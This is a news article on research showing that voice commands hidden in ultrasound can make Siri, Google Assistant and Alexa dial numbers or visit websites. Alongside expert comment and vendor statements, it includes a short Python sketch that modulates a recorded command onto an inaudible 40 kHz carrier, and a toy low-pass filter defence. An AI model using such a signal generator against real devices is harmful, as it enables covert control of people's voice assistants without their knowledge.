“Dolphin” attacks can trick voice assistants

Research teams work out hacking method for AI voice assistants

[Image: Siri vs Google Voice]

Voice assistants are one of the better Living In The Future developments of recent years, allowing you to control various things in your house and on your phone with only your own dulcet tones. But as with any new tech, there are kinks to work out, and researchers have found a way to hack the machines.

The Amazon, Google and Apple assistants have all been found to respond to commands broadcast at ultrasonic frequencies, which can be heard by dolphins but not by humans. A Chinese research team has reported being able to make smartphones running the assistants dial phone numbers and visit websites. Additionally, an American team working on a separate study has been able to activate the Amazon Echo smart speaker using the same method. The latter said the attack worked because the target machine’s microphone processed the ultrasonic audio and interpreted it as human speech.

“After processing this ultrasound, the microphone’s recording… is quite similar to the normal voice,” they said in a research paper.
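
To picture how such a signal is built, the broad idea is amplitude modulation: the voice command is shifted onto a carrier above the range of human hearing, and nonlinearity in the microphone hardware shifts it back down into the audible band. The following is a minimal sketch of that idea, not the researchers’ actual tooling; the 40 kHz carrier, 192 kHz output rate and file names are illustrative assumptions.

    import numpy as np
    from scipy.io import wavfile

    # Sketch only: amplitude-modulate a recorded voice command onto an
    # ultrasonic carrier. Carrier frequency, sample rate and file names
    # are illustrative assumptions, not the researchers' values.
    CARRIER_HZ = 40_000   # well above the ~20 kHz ceiling of human hearing
    OUT_RATE = 192_000    # high enough to represent the carrier

    rate, voice = wavfile.read("command.wav")   # hypothetical input file
    voice = voice.astype(np.float64)
    if voice.ndim > 1:                          # mix stereo down to mono
        voice = voice.mean(axis=1)
    voice /= np.max(np.abs(voice))              # normalise to [-1, 1]

    # Resample the baseband command up to the output rate.
    t_in = np.arange(len(voice)) / rate
    t_out = np.arange(int(len(voice) * OUT_RATE / rate)) / OUT_RATE
    baseband = np.interp(t_out, t_in, voice)

    # Classic AM: (1 + signal) times the carrier. A microphone with a
    # nonlinear (roughly squaring) response demodulates this back into
    # the audible band, which is what makes the command "reappear".
    carrier = np.cos(2 * np.pi * CARRIER_HZ * t_out)
    modulated = (1 + baseband) * carrier / 2

    wavfile.write("ultrasonic.wav", OUT_RATE,
                  (modulated * 32767).astype(np.int16))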

As long as attackers use each assistant’s wake word (Google’s “OK Google”, Apple’s “Hey Siri” or Amazon’s “Alexa”), the attack works. It is worth noting, though, that Google’s assistant can be set up to respond only to one person’s voice, Siri requires a smartphone to be unlocked before performing activities such as visiting websites, and the wake word feature can be turned off on both Siri and the Google assistant.

“Although the devices are not designed to handle ultrasound, if you put something just outside the range of human hearing, the assistant can still receive it so it’s certainly possible,” said Dr Steven Murdoch, a cyber-security researcher at University College London.

“Whether it’s realistic is another question. At the moment there’s not a great deal of harm that could be caused by the attack. Smart speakers are designed not to do harmful things. I would expect the smart speaker vendors will be able to do something about it and ignore the higher frequencies.”
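
Dr Murdoch’s suggested fix, ignoring the higher frequencies, amounts to filtering out energy above the voice band before audio reaches the speech recogniser. A real fix would most likely live in the microphone hardware or firmware, since the demodulation happens at capture time; the toy software sketch below simply assumes ultrasonic content survives in the digitised samples, and the 8 kHz cutoff and 48 kHz sample rate are assumptions.

    import numpy as np
    from scipy.signal import butter, sosfilt

    # Toy version of "ignore the higher frequencies": low-pass filter
    # captured audio before recognition. The cutoff and sample rate
    # are illustrative assumptions.
    SAMPLE_RATE = 48_000
    CUTOFF_HZ = 8_000     # human speech energy sits well below this

    def suppress_ultrasound(samples: np.ndarray) -> np.ndarray:
        """Low-pass filter a buffer of raw microphone samples."""
        sos = butter(8, CUTOFF_HZ, btype="low", fs=SAMPLE_RATE, output="sos")
        return sosfilt(sos, samples)

    # Usage: cleaned = suppress_ultrasound(raw_samples)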

Google and Amazon have both released statements saying they’re investigating the claims made in the researchers’ papers.